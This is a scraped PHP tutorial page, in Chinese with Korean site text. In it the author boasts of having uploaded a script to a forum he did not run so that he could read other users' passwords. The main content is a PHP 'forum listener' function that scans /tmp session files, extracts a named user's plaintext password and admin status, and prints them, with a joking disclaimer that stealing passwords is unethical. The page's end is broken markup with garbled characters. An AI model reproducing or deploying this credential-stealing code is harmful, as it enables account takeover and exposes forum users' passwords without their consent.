>  기사  >  php教程  >  一个查看session内容的函数:

一个查看session内容的函数:

WBOY
WBOY원래의
2016-06-13 11:21:161219검색

之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:

function submit1(){
global $username;
print "

论坛监听器";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?连我你也查?";
    return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]==""".$username."""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."
使用密码:".$passwd[2]."
使用模式:";
if($mode[1]==1)
print "管理员";
else
print "一般用户";
print"

偷窃他人密码是不道德行为请少少为之
";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗?如你确定,请再来一次,不要多打空格!";
$d->close();
}
function login(){
?>


论坛监听器




璁哄

성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
이전 기사:1. 引子다음 기사:php给图片增加中文水印